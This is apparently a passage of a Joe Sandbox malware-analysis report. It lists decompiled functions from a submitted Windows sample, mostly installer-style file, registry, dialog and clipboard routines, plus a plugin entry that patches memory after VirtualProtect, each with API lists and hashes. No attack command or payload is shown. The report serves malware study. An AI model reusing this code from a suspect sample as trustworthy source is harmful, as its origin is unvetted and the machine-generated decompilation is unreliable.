                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 5df830ec8081628c906cb6b3941fc93fb328a3f8e8f16404b38d361d687dc965
                                  • Instruction ID: 17f37b219c6dc411dd2b2fa4057394c3483c25ebcdd970f38988b6a36dadc869
                                  • Opcode Fuzzy Hash: 5df830ec8081628c906cb6b3941fc93fb328a3f8e8f16404b38d361d687dc965
                                  • Instruction Fuzzy Hash: F5D01272908120BFC2113728EE0C89BBF95DB54371B018F31FD69A22F0C7304C62CA95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00402239(int __eax, CHAR* __ebx) {
                                  				CHAR* _t11;
                                  				void* _t13;
                                  				CHAR* _t14;
                                  				void* _t18;
                                  				int _t22;
                                  
                                  				_t11 = __ebx;
                                  				_t5 = __eax;
                                  				_t14 = 0;
                                  				if(__eax != __ebx) {
                                  					__eax = E00402A07(__ebx);
                                  				}
                                  				if(_t13 != _t11) {
                                  					_t14 = E00402A07(0x11);
                                  				}
                                  				if( *((intOrPtr*)(_t18 - 0x14)) != _t11) {
                                  					_t11 = E00402A07(0x22);
                                  				}
                                  				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E00402A07(0xffffffcd)); // executed
                                  				_t22 = _t5;
                                  				if(_t22 == 0) {
                                  					 *((intOrPtr*)(_t18 - 4)) = 1;
                                  				}
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t18 - 4));
                                  				return 0;
                                  			}









                                  APIs
                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402272
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: PrivateProfileStringWrite
                                  • String ID:
                                  • API String ID: 390214022-0
                                  • Opcode ID: c7b122aad6aafb3e384dd29e2e634c2e76d40bd9855d3ea0291e0a4436e423b8
                                  • Instruction ID: 594037780aef2bbb7222699eae6bef26f59cc054eef20af3a1b4cc0f61f7743a
                                  • Opcode Fuzzy Hash: c7b122aad6aafb3e384dd29e2e634c2e76d40bd9855d3ea0291e0a4436e423b8
                                  • Instruction Fuzzy Hash: ADE04F32B001E56ADB207AF18ECDD7FA1589B8434CB15017FF601B62C2DDBC2D418AA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 44%
                                  			E004025DD(void* __eflags) {
                                  				long _t6;
                                  				long _t8;
                                  				LONG* _t10;
                                  				void* _t12;
                                  				void* _t15;
                                  				void* _t17;
                                  
                                  				_push(ds);
                                  				if(__eflags != 0) {
                                  					_t6 = E004029EA(2);
                                  					_t8 = SetFilePointer(E00405B0F(_t12, _t15), _t6, _t10,  *(_t17 - 0x18)); // executed
                                  					if( *((intOrPtr*)(_t17 - 0x20)) >= _t10) {
                                  						_push(_t8);
                                  						E00405AF6();
                                  					}
                                  				}
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t17 - 4));
                                  				return 0;
                                  			}










                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004025F7
                                    • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: FilePointerwsprintf
                                  • String ID:
                                  • API String ID: 327478801-0
                                  • Opcode ID: 2bf05ba17718530c6fe0701af64caadc32223a7f1939e216a8af0a1093029193
                                  • Instruction ID: 9b79bc57a545877cc82f6085c62fac977e34f5f1dcfdecb1c33821ac61e83e99
                                  • Opcode Fuzzy Hash: 2bf05ba17718530c6fe0701af64caadc32223a7f1939e216a8af0a1093029193
                                  • Instruction Fuzzy Hash: E4E04F77A04110ABD701F7E56E4ADBF7668EB04319B14853BF501F10D2C6BD58019A6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00402B11(void* __eflags, void* _a4) {
                                  				signed int _t6;
                                  				char* _t8;
                                  				intOrPtr _t9;
                                  				signed int _t11;
                                  
                                  				_t6 =  *0x42ec50; // 0x100
                                  				_t8 = E00402A07(0x22);
                                  				_t9 =  *0x40afc0; // 0x19e590
                                  				_t11 = RegOpenKeyExA(E00402AFC( *((intOrPtr*)(_t9 + 4))), _t8, 0, _t6 | _a4,  &_a4); // executed
                                  				asm("sbb eax, eax");
                                  				return  !( ~_t11) & _a4;
                                  			}








                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B39
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: d58126dc33ff389aa40f2a05a53f78a853406ba41794b6351ae5040632aa3466
                                  • Instruction ID: 0b28659bbc1d1e591b010bb8b89045cb2232f94fbe33c9534bf79020f9b3c98c
                                  • Opcode Fuzzy Hash: d58126dc33ff389aa40f2a05a53f78a853406ba41794b6351ae5040632aa3466
                                  • Instruction Fuzzy Hash: EBE0E676250109BFD710EFE6DD47FA57BDCB704754F004425B608E7091CA74E5509B59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040308E(void* _a4, long _a8) {
                                  				int _t6;
                                  				long _t10;
                                  
                                  				_t10 = _a8;
                                  				_t6 = ReadFile( *0x409018, _a4, _t10,  &_a8, 0); // executed
                                  				if(_t6 == 0 || _a8 != _t10) {
                                  					return 0;
                                  				} else {
                                  					return 1;
                                  				}
                                  			}






                                  APIs
                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EBB,000000FF,00000004,00000000,00000000,00000000), ref: 004030A5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
                                  • Instruction ID: 5f111b40a0b3629fd10373ff15fdd2cb33e52a8e4a636b5fd16f787c111e88a9
                                  • Opcode Fuzzy Hash: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
                                  • Instruction Fuzzy Hash: 5FE08C32141118BBCF215E519C00AE73B5CEB003A2F00C032BA08E6290D630EA599BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                  
                                  				 *0x10004038 = _a4;
                                  				if(_a8 == 1) {
                                  					VirtualProtect(0x1000404c, 4, 0x40, 0x1000403c); // executed
                                  					 *0x1000404c = 0xc2;
                                  					 *0x1000403c = 0;
                                  					 *0x10004044 = 0;
                                  					 *0x10004058 = 0;
                                  					 *0x10004048 = 0;
                                  					 *0x10004040 = 0;
                                  					 *0x10004050 = 0;
                                  					 *0x1000404e = 0;
                                  				}
                                  				return 1;
                                  			}




                                  APIs
                                  • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 100026E0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID:
                                  • API String ID: 544645111-0
                                  • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                  • Instruction ID: 50d40a96d24def304b4b26cf20c6df658c6444d5d293e09e435d7040471c3010
                                  • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                  • Instruction Fuzzy Hash: 2BF09BF19092A0DEF360DF688CC47063FE4E7983D5B03852AE358F6269EB3445448B19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00401595() {
                                  				int _t5;
                                  				void* _t11;
                                  				int _t14;
                                  
                                  				_t5 = SetFileAttributesA(E00402A07(0xfffffff0),  *(_t11 - 0x20)); // executed
                                  				_t14 = _t5;
                                  				if(_t14 == 0) {
                                  					 *((intOrPtr*)(_t11 - 4)) = 1;
                                  				}
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t11 - 4));
                                  				return 0;
                                  			}







                                  APIs
                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 4d472c43639dc04def5d2b840e89fb0869f99a80fec98c3c568aaf3f843f624b
                                  • Instruction ID: 491e9dad881d306943984f2b5cfdc1394ca5d0b553b86ee0e5f4f48b65607393
                                  • Opcode Fuzzy Hash: 4d472c43639dc04def5d2b840e89fb0869f99a80fec98c3c568aaf3f843f624b
                                  • Instruction Fuzzy Hash: 28D01233B081109BDB10DBE99E4899D77A09B04324F248637D111F11D1D6B99541561D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004030C0(long _a4) {
                                  				long _t2;
                                  
                                  				_t2 = SetFilePointer( *0x409018, _a4, 0, 0); // executed
                                  				return _t2;
                                  			}




                                  0x004030ce
                                  0x004030d4

                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DFA,00008BE4), ref: 004030CE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                  • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                  • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                  • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403EDD(int _a4) {
                                  				long _t2;
                                  
                                  				_t2 = SendMessageA( *0x42eba8, 0x28, _a4, 1); // executed
                                  				return _t2;
                                  			}




                                  0x00403eeb
                                  0x00403ef1

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 82644edcf3efe4120ad3297303d077226593b8c1deeca385b8ec1e4b65c8b5e6
                                  • Instruction ID: f46d431e8e7408228874a808ffc2914bf6276662b6e951ab0ea6f6a7c2946d50
                                  • Opcode Fuzzy Hash: 82644edcf3efe4120ad3297303d077226593b8c1deeca385b8ec1e4b65c8b5e6
                                  • Instruction Fuzzy Hash: D3B01235685200BFFE328B00DD0DF457E62F764701F008034B301240F0C6B210A1EB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004014D6() {
                                  				long _t2;
                                  				void* _t6;
                                  				void* _t10;
                                  
                                  				_t2 = E004029EA(_t6);
                                  				if(_t2 <= 1) {
                                  					_t2 = 1;
                                  				}
                                  				Sleep(_t2); // executed
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t10 - 4));
                                  				return 0;
                                  			}







                                  APIs
                                  • Sleep.KERNELBASE(00000000), ref: 004014E5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 0603eb80091a95b1f602976c8f6e7bfccfb3fb5df01df8ae88225197d1fd4128
                                  • Instruction ID: acaa6b3476ad5fafda8d7447acda5005b584cdaf565da1723a927038707b88e4
                                  • Opcode Fuzzy Hash: 0603eb80091a95b1f602976c8f6e7bfccfb3fb5df01df8ae88225197d1fd4128
                                  • Instruction Fuzzy Hash: 06D0C977B141008BD750E7B9AE8995A73A8FB413293244C33E502E11A2D579D812861D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E10001215() {
                                  				void* _t1;
                                  
                                  				_t1 = GlobalAlloc(0x40,  *0x1000405c); // executed
                                  				return _t1;
                                  			}




                                  0x1000121d
                                  0x10001223

                                  APIs
                                  • GlobalAlloc.KERNELBASE(00000040,10001251,?,?,100014DE,?,10001020,10001019,00000001), ref: 1000121D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: AllocGlobal
                                  • String ID:
                                  • API String ID: 3761449716-0
                                  • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                  • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                  • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                  • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E00404FE3(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                  				struct HWND__* _v8;
                                  				long _v12;
                                  				struct tagRECT _v28;
                                  				void* _v36;
                                  				signed int _v40;
                                  				int _v44;
                                  				int _v48;
                                  				signed int _v52;
                                  				int _v56;
                                  				void* _v60;
                                  				void* _v68;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				long _t87;
                                  				unsigned int _t92;
                                  				unsigned int _t93;
                                  				int _t94;
                                  				int _t95;
                                  				long _t98;
                                  				void* _t101;
                                  				intOrPtr _t123;
                                  				struct HWND__* _t127;
                                  				int _t149;
                                  				int _t150;
                                  				struct HWND__* _t154;
                                  				struct HWND__* _t158;
                                  				struct HMENU__* _t160;
                                  				long _t162;
                                  				void* _t163;
                                  				char* _t164;
                                  				char* _t165;
                                  
                                  				_t154 =  *0x42e384; // 0x0
                                  				_t149 = 0;
                                  				_v8 = _t154;
                                  				if(_a8 != 0x110) {
                                  					__eflags = _a8 - 0x405;
                                  					if(_a8 == 0x405) {
                                  						CloseHandle(CreateThread(0, 0, E00404F77, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                  					}
                                  					__eflags = _a8 - 0x111;
                                  					if(_a8 != 0x111) {
                                  						L17:
                                  						__eflags = _a8 - 0x404;
                                  						if(_a8 != 0x404) {
                                  							L25:
                                  							__eflags = _a8 - 0x7b;
                                  							if(_a8 != 0x7b) {
                                  								goto L20;
                                  							}
                                  							__eflags = _a12 - _t154;
                                  							if(_a12 != _t154) {
                                  								goto L20;
                                  							}
                                  							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                  							__eflags = _t87 - _t149;
                                  							_a8 = _t87;
                                  							if(_t87 <= _t149) {
                                  								L37:
                                  								return 0;
                                  							}
                                  							_t160 = CreatePopupMenu();
                                  							AppendMenuA(_t160, _t149, 1, E00405BBA(_t149, _t154, _t160, _t149, 0xffffffe1));
                                  							_t92 = _a16;
                                  							__eflags = _t92 - 0xffffffff;
                                  							if(_t92 != 0xffffffff) {
                                  								_t150 = _t92;
                                  								_t93 = _t92 >> 0x10;
                                  								__eflags = _t93;
                                  								_t94 = _t93;
                                  							} else {
                                  								GetWindowRect(_t154,  &_v28);
                                  								_t150 = _v28.left;
                                  								_t94 = _v28.top;
                                  							}
                                  							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                  							_t162 = 1;
                                  							__eflags = _t95 - 1;
                                  							if(_t95 == 1) {
                                  								_v60 = _t149;
                                  								_v48 = 0x42a020;
                                  								_v44 = 0xfff;
                                  								_a4 = _a8;
                                  								do {
                                  									_a4 = _a4 - 1;
                                  									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                                  									__eflags = _a4 - _t149;
                                  									_t162 = _t162 + _t98 + 2;
                                  								} while (_a4 != _t149);
                                  								OpenClipboard(_t149);
                                  								EmptyClipboard();
                                  								_t101 = GlobalAlloc(0x42, _t162);
                                  								_a4 = _t101;
                                  								_t163 = GlobalLock(_t101);
                                  								do {
                                  									_v48 = _t163;
                                  									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                                  									 *_t164 = 0xd;
                                  									_t165 = _t164 + 1;
                                  									 *_t165 = 0xa;
                                  									_t163 = _t165 + 1;
                                  									_t149 = _t149 + 1;
                                  									__eflags = _t149 - _a8;
                                  								} while (_t149 < _a8);
                                  								GlobalUnlock(_a4);
                                  								SetClipboardData(1, _a4);
                                  								CloseClipboard();
                                  							}
                                  							goto L37;
                                  						}
                                  						__eflags =  *0x42e36c - _t149; // 0x0
                                  						if(__eflags == 0) {
                                  							ShowWindow( *0x42eba8, 8);
                                  							__eflags =  *0x42ec2c - _t149; // 0x0
                                  							if(__eflags == 0) {
                                  								E00404EA5( *((intOrPtr*)( *0x4297f8 + 0x34)), _t149);
                                  							}
                                  							E00403E81(1);
                                  							goto L25;
                                  						}
                                  						 *0x4293f0 = 2;
                                  						E00403E81(0x78);
                                  						goto L20;
                                  					} else {
                                  						__eflags = _a12 - 0x403;
                                  						if(_a12 != 0x403) {
                                  							L20:
                                  							return E00403F0F(_a8, _a12, _a16);
                                  						}
                                  						ShowWindow( *0x42e370, _t149);
                                  						ShowWindow(_t154, 8);
                                  						E00403EDD(_t154);
                                  						goto L17;
                                  					}
                                  				}
                                  				_v52 = _v52 | 0xffffffff;
                                  				_v40 = _v40 | 0xffffffff;
                                  				_v60 = 2;
                                  				_v56 = 0;
                                  				_v48 = 0;
                                  				_v44 = 0;
                                  				asm("stosd");
                                  				asm("stosd");
                                  				_t123 =  *0x42ebb0; // 0x5aa248
                                  				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
                                  				_a12 =  *((intOrPtr*)(_t123 + 0x60));
                                  				 *0x42e370 = GetDlgItem(_a4, 0x403);
                                  				 *0x42e368 = GetDlgItem(_a4, 0x3ee);
                                  				_t127 = GetDlgItem(_a4, 0x3f8);
                                  				 *0x42e384 = _t127;
                                  				_v8 = _t127;
                                  				E00403EDD( *0x42e370);
                                  				 *0x42e374 = E00404743(4);
                                  				 *0x42e38c = 0;
                                  				GetClientRect(_v8,  &_v28);
                                  				_v52 = _v28.right - GetSystemMetrics(0x15);
                                  				SendMessageA(_v8, 0x101b, 0,  &_v60);
                                  				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                  				if(_a8 >= 0) {
                                  					SendMessageA(_v8, 0x1001, 0, _a8);
                                  					SendMessageA(_v8, 0x1026, 0, _a8);
                                  				}
                                  				if(_a12 >= _t149) {
                                  					SendMessageA(_v8, 0x1024, _t149, _a12);
                                  				}
                                  				_push( *((intOrPtr*)(_a16 + 0x30)));
                                  				_push(0x1b);
                                  				E00403EA8(_a4);
                                  				if(( *0x42ebb8 & 0x00000003) != 0) {
                                  					ShowWindow( *0x42e370, _t149);
                                  					if(( *0x42ebb8 & 0x00000002) != 0) {
                                  						 *0x42e370 = _t149;
                                  					} else {
                                  						ShowWindow(_v8, 8);
                                  					}
                                  					E00403EDD( *0x42e368);
                                  				}
                                  				_t158 = GetDlgItem(_a4, 0x3ec);
                                  				SendMessageA(_t158, 0x401, _t149, 0x75300000);
                                  				if(( *0x42ebb8 & 0x00000004) != 0) {
                                  					SendMessageA(_t158, 0x409, _t149, _a12);
                                  					SendMessageA(_t158, 0x2001, _t149, _a8);
                                  				}
                                  				goto L37;
                                  			}



































                                  0x00405008
                                  0x00405011
                                  0x00405018
                                  0x0040501b
                                  0x0040501e
                                  0x00405021
                                  0x00405022
                                  0x00405023
                                  0x0040503c
                                  0x0040503f
                                  0x00405049
                                  0x00405058
                                  0x00405060
                                  0x00405068
                                  0x0040506d
                                  0x00405070
                                  0x0040507c
                                  0x00405085
                                  0x0040508e
                                  0x004050b1
                                  0x004050b7
                                  0x004050c8
                                  0x004050cd
                                  0x004050db
                                  0x004050e9
                                  0x004050e9
                                  0x004050ee
                                  0x004050fc
                                  0x004050fc
                                  0x00405101
                                  0x00405104
                                  0x00405109
                                  0x00405115
                                  0x0040511e
                                  0x0040512b
                                  0x0040513a
                                  0x0040512d
                                  0x00405132
                                  0x00405132
                                  0x00405146
                                  0x00405146
                                  0x0040515a
                                  0x00405163
                                  0x0040516c
                                  0x0040517c
                                  0x00405188
                                  0x00405188
                                  0x00000000

                                  APIs
                                  • GetDlgItem.USER32 ref: 00405042
                                  • GetDlgItem.USER32 ref: 00405051
                                  • GetClientRect.USER32 ref: 0040508E
                                  • GetSystemMetrics.USER32 ref: 00405096
                                  • SendMessageA.USER32 ref: 004050B7
                                  • SendMessageA.USER32 ref: 004050C8
                                  • SendMessageA.USER32 ref: 004050DB
                                  • SendMessageA.USER32 ref: 004050E9
                                  • SendMessageA.USER32 ref: 004050FC
